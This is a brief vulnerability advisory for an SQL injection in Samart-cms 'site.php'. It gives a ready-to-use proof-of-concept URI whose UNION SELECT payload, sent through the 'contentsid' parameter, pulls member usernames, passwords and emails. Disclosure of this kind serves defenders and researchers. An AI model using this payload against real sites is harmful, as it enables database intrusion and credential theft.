Samart-cms 'site.php' SQL Injection Vulnerability

Samart-cms 'site.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following proof-of-concept URI is available:

http://www.example.com/site.php?contentsid=-1+UNION%20SELECT+1,2,4,3,concat_ws(char(58),m_id,m_username,m_password,m_email),6,7+from+member/*